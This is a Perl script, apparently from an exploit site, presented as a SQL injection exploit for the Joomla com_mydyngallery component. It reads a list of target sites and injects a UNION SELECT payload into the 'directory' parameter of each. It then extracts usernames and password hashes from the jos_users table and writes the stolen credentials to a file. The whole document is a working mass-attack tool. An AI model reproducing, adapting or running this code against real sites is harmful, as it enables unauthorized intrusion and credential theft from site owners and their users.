com_mydyngallery Sqli Exploit

1.    
2.  
3.     #!/usr/bin/perl
4.     #(c) sec4ever.com
5.     use LWP::UserAgent;
6.     $| = 1;
7.     our $ua = LWP::UserAgent->new;
8.     $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
9.     $ua->timeout(20);
10.     die "+ usage: perl $0 sitelist.txt out.txt\n" unless defined $ARGV[0];
11.     my $out = defined $ARGV[1] ? $ARGV[1] : "out.txt";
12.     my $payload = q{/index.php?option=com_mydyngallery&Itemid=&task=liste&directory=1' union select 1,2,3,group_concat(0x7c7334657c,username,0x3e,password,0x7c7334657c),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from jos_users%60};
13.    
14.    open (sites,"<".$ARGV[0]) or die $!;
15.    open (out,">>".$out) or die $!;
16.    while (my $site = <sites>)
17.    {
18.            chomp ($site);
19.            $site = clean($site);
20.            print $site." | ";
21.            my $cont = $ua->get("http://".$site.$payload)->content;
22.            #print $cont;
23.            my ($info) = $cont =~ /\|s4e\|(.*?)\|s4e\|/g;
24.        if($info)
25.        {
26.            print $info."\n";
27.            print out $site." | ".$info."\n";
28.    
29.        }else{
30.            print "faild\n";
31.        }
32.    }
33.    close(out,sites);
34.    
35.    sub clean {
36.    $_[0] =~ s/http[s]?:\/\/[www\.]{3}?[\.]?//g if $_[0] =~ /http[s]?:\/\/[www\.]{3}?[\.]?/g;
37.    $_[0] =~ s/http[s]?:\/\///g if $_[0] =~ /http[s]?:\/\//g;
38.    $_[0] =~ s/[\/]$// if $_[0] =~ /[\/]$/m;
39.    return $_[0];
40.    }